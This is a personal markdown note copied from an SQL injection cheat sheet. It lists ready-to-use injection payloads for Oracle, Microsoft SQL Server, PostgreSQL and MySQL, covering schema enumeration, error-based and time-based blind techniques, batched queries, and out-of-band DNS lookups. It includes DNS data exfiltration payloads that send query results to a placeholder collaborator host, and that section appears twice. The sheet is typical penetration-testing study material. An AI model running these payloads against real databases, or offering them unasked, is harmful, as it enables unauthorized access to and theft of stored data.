sql_injection
"/home/yossef/notes/personal/hacking/sql_injection.md"
path: personal/hacking/sql_injection.md
- **fileName**: sql_injection
- **Created on**: 2025-06-24 13:01:06
SQL Injection Cheat Sheet
This SQL injection cheat sheet contains examples of useful syntax for
performing various SQL injection attacks.
String Concatenation
Concatenate multiple strings into a single string.
Oracle: 'foo'||'bar'
Microsoft: 'foo'+'bar'
PostgreSQL: 'foo'||'bar'
MySQL: 'foo' 'bar' [Note the space]
CONCAT('foo','bar')
Substring
Extract part of a string from a specified offset (1-based). Each returns 'ba'.
Oracle: SUBSTR('foobar', 4, 2)
Microsoft: SUBSTRING('foobar', 4, 2)
PostgreSQL: SUBSTRING('foobar', 4, 2)
MySQL: SUBSTRING('foobar', 4, 2)
Comments
Truncate queries by commenting out the remaining portion.
Oracle: --comment
Microsoft: --comment
/*comment*/
PostgreSQL: --comment
/*comment*/
MySQL: #comment
-- comment [Note space after --]
/*comment*/
Database Version
Query database type and version.
Oracle: SELECT banner FROM v$version
SELECT version FROM v$instance
Microsoft: SELECT @@version
PostgreSQL: SELECT version()
MySQL: SELECT @@version
Database Contents
List tables and columns.
Oracle: SELECT * FROM all_tables
SELECT * FROM all_tab_columns
WHERE table_name = 'TABLE-NAME-HERE'
Microsoft: SELECT * FROM information_schema.tables
SELECT * FROM information_schema.columns
WHERE table_name = 'TABLE-NAME-HERE'
PostgreSQL: SELECT * FROM information_schema.tables
SELECT * FROM information_schema.columns
WHERE table_name = 'TABLE-NAME-HERE'
MySQL: SELECT * FROM information_schema.tables
SELECT * FROM information_schema.columns
WHERE table_name = 'TABLE-NAME-HERE'
Conditional Errors
Trigger errors based on boolean conditions.
Oracle: SELECT CASE WHEN (YOUR-CONDITION-HERE)
THEN TO_CHAR(1/0) ELSE NULL END FROM dual
Microsoft: SELECT CASE WHEN (YOUR-CONDITION-HERE)
THEN 1/0 ELSE NULL END
PostgreSQL: 1 = (SELECT CASE WHEN (YOUR-CONDITION-HERE)
THEN 1/(SELECT 0) ELSE NULL END)
MySQL: SELECT IF(YOUR-CONDITION-HERE,
(SELECT table_name FROM information_schema.tables),'a')
Batched Queries
Execute multiple queries (results not returned to application).
Oracle: Not supported
Microsoft: QUERY-1-HERE; QUERY-2-HERE
QUERY-1-HERE QUERY-2-HERE
PostgreSQL: QUERY-1-HERE; QUERY-2-HERE
MySQL: QUERY-1-HERE; QUERY-2-HERE [Limited support]
Time Delays
Cause unconditional time delays (10 seconds).
Oracle: dbms_pipe.receive_message(('a'),10)
Microsoft: WAITFOR DELAY '0:0:10'
PostgreSQL: SELECT pg_sleep(10)
MySQL: SELECT SLEEP(10)
Conditional Time Delays
Trigger delays based on boolean conditions.
Oracle: SELECT CASE WHEN (YOUR-CONDITION-HERE)
THEN 'a'||dbms_pipe.receive_message(('a'),10)
ELSE NULL END FROM dual
Microsoft: IF (YOUR-CONDITION-HERE) WAITFOR DELAY '0:0:10'
PostgreSQL: SELECT CASE WHEN (YOUR-CONDITION-HERE)
THEN pg_sleep(10) ELSE pg_sleep(0) END
MySQL: SELECT IF(YOUR-CONDITION-HERE,SLEEP(10),'a')
DNS Lookup
Trigger external DNS lookups (requires Burp Collaborator).
Oracle: SELECT EXTRACTVALUE(xmltype('<?xml version="1.0"?>
<!DOCTYPE root [ <!ENTITY % remote SYSTEM
"http://BURP-COLLABORATOR-SUBDOMAIN/"> %remote;]>'),'/l')
FROM dual
Microsoft: exec master..xp_dirtree
'//BURP-COLLABORATOR-SUBDOMAIN/a'
PostgreSQL: copy (SELECT '') to program
'nslookup BURP-COLLABORATOR-SUBDOMAIN'
MySQL: LOAD_FILE('\\\\BURP-COLLABORATOR-SUBDOMAIN\\a')
[Windows only]
DNS Data Exfiltration
Exfiltrate data via DNS lookups.
Oracle: SELECT EXTRACTVALUE(xmltype('<?xml version="1.0"?>
<!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||
(SELECT YOUR-QUERY-HERE)||
'.BURP-COLLABORATOR-SUBDOMAIN/"> %remote;]>'),'/l')
FROM dual
Microsoft: declare @p varchar(1024);set @p=(SELECT YOUR-QUERY-HERE);
exec('master..xp_dirtree "//'+@p+
'.BURP-COLLABORATOR-SUBDOMAIN/a"')
PostgreSQL: create OR replace function f() returns void as $
declare c text; declare p text;
begin SELECT into p (SELECT YOUR-QUERY-HERE);
c := 'copy (SELECT '''') to program ''nslookup '||p||
'.BURP-COLLABORATOR-SUBDOMAIN'''; execute c; END;
$ language plpgsql security definer; SELECT f();
MySQL: SELECT YOUR-QUERY-HERE INTO OUTFILE
'\\\\BURP-COLLABORATOR-SUBDOMAIN\a' [Windows only]
Oracle: SELECT EXTRACTVALUE(xmltype('<?xml version="1.0"?>
<!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||
(SELECT YOUR-QUERY-HERE)||
'.BURP-COLLABORATOR-SUBDOMAIN/"> %remote;]>'),'/l')
FROM dual
Microsoft: declare @p varchar(1024);set @p=(SELECT YOUR-QUERY-HERE);
exec('master..xp_dirtree "//'+@p+
'.BURP-COLLABORATOR-SUBDOMAIN/a"')
PostgreSQL: create OR replace function f() returns void as $
declare c text; declare p text;
begin SELECT into p (SELECT YOUR-QUERY-HERE);
c := 'copy (SELECT '''') to program ''nslookup '||p||
'.BURP-COLLABORATOR-SUBDOMAIN'''; execute c; END;
$ language plpgsql security definer; SELECT f();
MySQL: SELECT YOUR-QUERY-HERE INTO OUTFILE
'\\\\BURP-COLLABORATOR-SUBDOMAIN\a' [Windows only]
for more information about this check this now:
continue:[[]]
before:[[]]